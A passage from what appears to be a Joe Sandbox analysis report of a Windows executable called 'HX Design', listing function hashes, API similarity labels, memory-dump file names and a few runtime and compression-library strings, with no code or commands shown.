                                                                                                                                                                                                                                                      • Instruction ID: 1ea5c8afbb47ba66bbf64b609c14576a7989d3710ea74ba72c908db5bd70bf6f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD315E72708B8596EB609F60E8803EEB360FB88704F84403ADA5E57B95DFBCD548D724
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                      • Instruction ID: 0f2ad1ecd311a0099d341dd3c5df9fd245612e76300dbd6449f156101301a07f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE31B636608F8196DB60EF24E8402BEB3A4FB88754F900135EA9D43B65DF7CC149DB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                                                                      • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                      • Instruction ID: 87bed1b45409a0ddc2972ac7848513cb50c134a8efad4fbc837271cc7f11f1ae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CB1E422B1869291EA60BB25D4001BBE3A1EF44FE4F845131EE5D57BC5EFBCE449E320
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                      • Instruction ID: 1da149ebf50e52701d1fc4aadaca410253ef4374f39da23dabcf6ae84371ee9d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E114C22B14B059AEB009B60E8442B973A4FB59758F840E31DA2D867A4EFB8D1A8C350
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                      • Instruction ID: 085cef3da2ae0f8ca229fe1fc210479fabded604d32e3839b9c644e336786686
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4C10372B1868697E724DF29A04466BFBA1F788B84F818134DB4E43784DF7DE809DB40
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                      • API String ID: 0-1127688429
                                                                                                                                                                                                                                                      • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                                      • Instruction ID: b8a072cdb307015c08eb6ddb8acee636edbf31f5412193eb60a3782249daed1a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF1C572B083C55BE7A5BF14C088B3ABAE9FF44740F454138DA4927791CBB8E948D764
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 15204871-0
                                                                                                                                                                                                                                                      • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                                      • Instruction ID: a6bc1ecd9cc9795e3d37afb77da4767e1bc86ae167f8cf8afe38c792723197a1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AB17C73A00B89CBEB15DF29C84636D7BA0F744B48F548821DA9D83BA4CF79D455C710
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                                                                      • API String ID: 0-227171996
                                                                                                                                                                                                                                                      • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                                      • Instruction ID: 50c42f16711616366c010a59ee69cd273e3c86fad0b11066653d6cb7f438c868
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61E1E332A08646A1FB68BF3D905113DB3A0FF44B48F945235DA4E07794DFBAE859E720
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                      • API String ID: 0-900081337
                                                                                                                                                                                                                                                      • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                                      • Instruction ID: 8fbcac0a17701b6138faad2dda130867bf35b549e05ede8840c92478f2e105d5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5691C772B182C69BE7A4AF14C488B3EBBA9FF44350F514139DA4A567C0CB7CE944DB24
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                                                                                                      • API String ID: 0-3030954782
                                                                                                                                                                                                                                                      • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                                      • Instruction ID: 8116abcdba5720d40171fdaf96a5f92640c1912abf976edb3f2f488b8971184f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6517862B182C596E724AE39D800779EB91E744B94F888231CBA847BC5CFBDE048D710
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                                                                                                      • API String ID: 0-1523873471
                                                                                                                                                                                                                                                      • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                      • Instruction ID: ca23f7b4e77834378833db50de30902c6de8582bdd42a0452b479be7f2e2c5bd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82A18962B0C7CA86EB21EF29A4007B9BB91EB51B84F448032DE5D47785DFBDE809D710
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: TMP
                                                                                                                                                                                                                                                      • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                      • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                                      • Instruction ID: dc287395b3f6c0687703ab1f97ff612a0a033800105cd657c0c2185d5d99d6a9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E51C311F0864361FAA4BB2B694517BD290AF44BD4FC84035DE0E57BD6EEBCE41AF220
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                                                      • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                                      • Instruction ID: b8102992a7ccbddad21fdd79165503ee786840b5dd6053f74ef379abfc947a61
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29B09220E07A42E2EA483B216C8221962A4BF48700FD80138C41C80330DE6C20EAA721
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                                      • Instruction ID: 88d2eb3ca84c9b6727bf8aa3a0f4fffa7f16292617ef37cc3b0cedfd20edc33c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD1B266A08646A5FB68BF3D804027DA7A0FB05B48FA44235CE0D077D5DFBDE849E760
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                                      • Instruction ID: bf3c30cff7d99bd7ca429dddb5704f1d07607634e330d7d9a36a050794944a55
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECC17E762181E08BD289EB29E46947A73E1F78930DBD5406BEF8747BC5C73CA514EB20
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                                      • Instruction ID: ff110b6f79546af53fac83eb1db10f863cbb1d644e841f1b8a6e4f96787e4de5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28B19D7290878599E764EF3DC05023CBBB0E749B48FA94136CA4E47395CFB9D849E760
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
